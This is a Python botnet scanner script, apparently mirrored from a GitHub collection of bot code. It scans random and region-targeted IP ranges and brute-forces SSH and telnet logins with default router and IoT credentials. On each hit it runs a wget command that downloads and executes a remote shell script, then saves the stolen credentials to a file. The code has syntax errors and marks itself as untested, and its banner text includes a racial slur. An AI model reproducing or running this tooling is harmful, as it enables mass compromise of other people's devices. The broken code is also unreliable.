mirror of https://github.com/threatland/TL-BOTS
328 lines
15 KiB
Python
328 lines
15 KiB
Python
#!/usr/bin/python
|
|
"""
|
|
Author: ~B1NARY~
|
|
Skype: bl4ck.j3sus
|
|
XMPP: b1nary@darkness.su
|
|
Title: ~B1NARY~ PRIVATE BOTNET SCANNER
|
|
Description: PRIVATE BOTNET SCANNER FROM YOUR OWN ~B1NARY~ Tha GoD
|
|
Version: 1.0
|
|
MADE DATE: 3-30-16
|
|
|
|
***THIS HAS NOT BEEN TESTED YET, IT MAY OT MAY NOT WORK***
|
|
"""
|
|
import threading, random, socket, time, sys, re, os, paramiko, StringIO, argparse, random
|
|
from multiproccessing import Process
|
|
paramiko.util.log_to_file("/dev/null")
|
|
|
|
#DEFINES
|
|
command="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh"
|
|
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
|
|
passlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
|
|
combolist = ["root:root","root:admin","admin:admin","ubnt:ubnt""root:1234","admin:1234","guest:guest","user:user","test:test","pi:raspberry","vagrant:vagrant"]
|
|
blacklist = ['127']
|
|
randomtext = random.choice('Start Infecting Routerz','Start Spreading Malware',
|
|
'Start Adding Them Botz','Make The Bot Count Go Up',
|
|
'Start..Nigga You Know What You Need Some Black Jesus','Know We Out Chere!!')
|
|
thread = threading.Thread
|
|
parser = argparse.ArgumentParser()
|
|
args = parser.parse_args()
|
|
thread_count = args.threadcount
|
|
bufferz = ''
|
|
start_time = time.time()
|
|
host = HOST
|
|
tn = socket.socket()
|
|
|
|
#BANNER
|
|
print '\r\n'
|
|
print '###############################################################################'
|
|
print '# ___ __________ ____ _______ _____ _______________.___. ___ #'
|
|
print '# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #'
|
|
print '# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #'
|
|
print '# | | \ | / | \/ | \ | \\____ | #'
|
|
print '# |______ / |___\____|__ /\____|__ /____|_ // ______| #'
|
|
print '# \/ \/ \/ \/ \/ #'
|
|
print '###############################################################################'
|
|
print 'r\n'
|
|
raw_input('Press <ENTER> To '+randomtext)
|
|
|
|
#ARGUMENTS
|
|
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
|
|
parser.add_argument("-x","--execute",type=str, help="Exucute Wget/tftp from List;[IP+USER+PASS")
|
|
parser.add_argument("-o","--output",type=str, help="OutputFile Name")
|
|
parser.add_argument("-l","--load",type=str, help="Scan As Bruting")
|
|
parser.add_argument("threadcount",type=str, help="# of Threads")
|
|
|
|
#THE CODING BEGINS
|
|
if args.brute:
|
|
read_h = open(str(args.brute),'a+')
|
|
elif args.brute:
|
|
mass_check(args.brute)
|
|
if args.load:
|
|
sshscanner(args.load)
|
|
elif args.load:
|
|
brutethenload(args.load)
|
|
|
|
|
|
if args.execute:
|
|
mass_pwn(args.execute)
|
|
|
|
class sshscanner(threading.Thread):
|
|
global combolist
|
|
ipclassinfo = sys.argv[2]
|
|
global ipclassinfo
|
|
if ipclassinfo == "A":
|
|
ip1 = sys.argv[3]
|
|
global ip1
|
|
elif ipclassinfo == "B":
|
|
ip1 = sys.argv[3].split(".")[0]
|
|
ip2 = sys.argv[3].split(".")[1]
|
|
global ip1
|
|
global ip2
|
|
elif ipclassinfo == "C":
|
|
ips = sys.argv[3].split(".")
|
|
num=0
|
|
for ip in ips:
|
|
num=num+1
|
|
if num == 1:
|
|
ip1 = ip
|
|
elif num == 2:
|
|
ip2 = ip
|
|
elif num == 3:
|
|
ip3 = ip
|
|
global ip1
|
|
global ip2
|
|
global ip3
|
|
def brutethenload(self):
|
|
while 1:
|
|
try:
|
|
while 1:
|
|
thisipisbad='no'
|
|
if ipclassinfo == "A":
|
|
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "B":
|
|
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "C":
|
|
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "BRAZIL":
|
|
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
|
|
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "SUPER":
|
|
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
|
|
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "LUCKY":
|
|
lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
|
|
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "LUCKY2":
|
|
lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
|
|
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "GOOD":
|
|
good = ["113.53","101.108","101.109"]
|
|
self.host = random.choice(good)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "ALL"
|
|
allips = ["113.53","101.108","101.109","152.12","125.11","125.26","125.27","200.62","179.127","186.232","179.106","179.222","179.107","201.75","201.225","161.10","161.18","179.127","187.107","187.102","187.121","179.32","201.221","131.72","131.161","131.255","131.221","186.232","186.207","179.33","186.112","186.113","186.114","186.115","186.116","186.117","186.118","186.119","62.24","78.144","78.145","78.146","78.147","78.148","78.149","78.150","78.151","84.13","89.241","89.242","89.243","92.10","92.11","92.12","92.13","92.14","92.17","92.15","92.18","92.16","92.23","92.24","92.25","92.26","92.27","92.28","92.29","84.43","84.13","195.74","195.12","84.252","84.242","84.144","84.240","178.239","31.164","31.165","188.154","188.155","179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",]
|
|
self.host = random.choice(allips)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "RAND":
|
|
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
else:
|
|
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
for badip in blacklist:
|
|
if badip in self.host:
|
|
thisipisbad='yes'
|
|
if thisipisbad=='no':
|
|
break
|
|
username='root'
|
|
password=""
|
|
port = 22
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.settimeout(3)
|
|
s.connect((self.host, port))
|
|
s.close()
|
|
ssh = paramiko.SSHClient()
|
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
dobreak=False
|
|
for passwd in combolist:
|
|
if ":n/a" in passwd:
|
|
password=""
|
|
else:
|
|
password=passwd.split(":")[1]
|
|
if "n/a:" in passwd:
|
|
username=""
|
|
else:
|
|
username=passwd.split(":")[0]
|
|
try:
|
|
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
|
|
dobreak=True
|
|
break
|
|
except:
|
|
pass
|
|
if True == dobreak:
|
|
break
|
|
badserver=True
|
|
stdin, stdout, stderr = ssh.exec_command("echo '\x67\x61\x79\x66\x67\x74'")
|
|
output = stdout.read()
|
|
if "gayfgt" in output:
|
|
badserver=False
|
|
if badserver == False:
|
|
print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
|
|
ssh.exec_command(""+command+"")
|
|
time.sleep(15)
|
|
file_h = open(sys.argv[4],'a')
|
|
file_h.write(self.host+":"+username+":"+password+"\n")
|
|
file_h.close()
|
|
ssh.close()
|
|
except:
|
|
pass
|
|
|
|
def sock_read_until(tn, criteria, timeout=30):
|
|
while time.time() - start_time < timeout:
|
|
bufferz += tn.recv(40960)
|
|
time.sleep(0.01)
|
|
if criteria in bufferz: return bufferz
|
|
raise Exception('sock_read_until \x1b[1;33m timeout \x1b[0m')
|
|
|
|
|
|
def mass_check(read_h):
|
|
try:
|
|
for line in open(read_h).readlines())
|
|
ip_info = line.split(":")
|
|
e = Thread(target=f, args=(ip_info[0],))
|
|
e.start()
|
|
print threading.active_count()
|
|
print threading.active_count() > thread_count:
|
|
pass
|
|
except KeyboardInterrupt: os.kill(os.getpid(),9)
|
|
|
|
|
|
def mass_pwn(targets_file):
|
|
try:
|
|
targets_file_h = open(targets_file).readlines()
|
|
for line in targets_file_h:
|
|
ip_info = line.split(":")
|
|
try:
|
|
e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
|
|
e.start()
|
|
except:
|
|
pass
|
|
|
|
print '[Thread]: ',threading.active_count()
|
|
while threading.active_count() > thread_cnt:
|
|
pass
|
|
|
|
except KeyboardInterrupt: os.kill(os.getpid(),9)
|
|
|
|
def loadem(HOST,user,password):
|
|
try:
|
|
x = ''
|
|
tn.connect((HOST,22))
|
|
print tn.recv(40960)
|
|
tn.send(user + "\n")
|
|
time.sleep(1)
|
|
print sock_read_until(tn,":",10)
|
|
tn.send(password + "\n")
|
|
print "Spraying"+HOST
|
|
tn.send("sh\n\n")
|
|
time.sleep(0.01)
|
|
x += sock_read_until(tn,"#",10)
|
|
print '[+] Got shell! '+HOST
|
|
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked')
|
|
for line in command("\n"):
|
|
tn.send(line+'\r\n'):
|
|
x = tn.recv(40960)
|
|
if '> ' in x: raise Exception
|
|
try:
|
|
arch = sock_read_until(tn,"#",3)
|
|
except:
|
|
arch = 'ILLEGAL!!!'
|
|
print arch
|
|
return arch
|
|
except:
|
|
pass
|
|
|
|
|
|
def f(ip):
|
|
ip = ip_rstrip()
|
|
for user in userlist:
|
|
for passw in passlist:
|
|
x= ''
|
|
try:
|
|
tn.settimeout(35)
|
|
tn.connect((ip,22))
|
|
except Exception as e:
|
|
print "\x1b[1;31m[x] Failed: \x1b[0m", ip,e
|
|
break
|
|
else:
|
|
try:
|
|
x += tn.recv(40960)
|
|
except:
|
|
print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
|
|
break
|
|
else:
|
|
try:
|
|
time.sleep(0.1)
|
|
x += tn.recv(40960)
|
|
sio = StringIO.StringIO(x)
|
|
try:
|
|
for i in sio.read(x)
|
|
if ord(i) == 251:
|
|
iac_dont_b = 1
|
|
elif ord(i) == 253:
|
|
iac_dont_b = 1
|
|
elif iac_wont_b == 1:
|
|
iac_wont(tn,ord(i))
|
|
iac_wont_b = 01
|
|
elif iac_dont_b = 1:
|
|
iac_dont(tn,ord(i))
|
|
iac_dont_b = 0
|
|
except:
|
|
print "THATS ILLEGAL!!!"
|
|
tn.send(user + "\r\n")
|
|
time.sleep(0.01)
|
|
if 'User Access Verification' in x:
|
|
raise Exception('cisco dicks')
|
|
x += tn.recv(409600)
|
|
tn.send("sh\n\n")
|
|
time.sleep(0.01)
|
|
tn.send("shell\n\n")
|
|
time.sleep(0.01)
|
|
sock_read_until(tn,"#")
|
|
tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\n\n")
|
|
time.sleep(0.01)
|
|
x += tn.recv(409600)
|
|
time.sleep(0.01)
|
|
try:
|
|
x += sock_read_until(tn,"binfagt")
|
|
if 'binfagt' not in x:
|
|
raise Exception('no binfagt')
|
|
if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x:
|
|
raise Exception('no prompt')
|
|
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x):
|
|
raise Exception('fucked')
|
|
except:
|
|
print "[failed execution]",e,ip.rstrip()
|
|
continue
|
|
else:
|
|
file_h = open(args.output,'a+')
|
|
file_h.write(ip_rstrip() + ":" + user + ":" + passw+'\n')
|
|
file_h.close()
|
|
print '\x1b[1;32m[*] Execution on: \x1b[0m ',ip
|
|
break
|
|
except Execution as e:
|
|
continue
|
|
continue
|
|
continue
|
|
continue
|
|
return
|
|
|
|
for x in range(0,int(sys.argv[1])):
|
|
try:
|
|
t = sshscanner()
|
|
t.start()
|
|
except:
|
|
pass
|
|
|
|
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
for badip in blacklist:
|
|
if badip in self.host:
|
|
thisipisbad='yes'
|
|
if thisipisbad=='no':
|
|
break |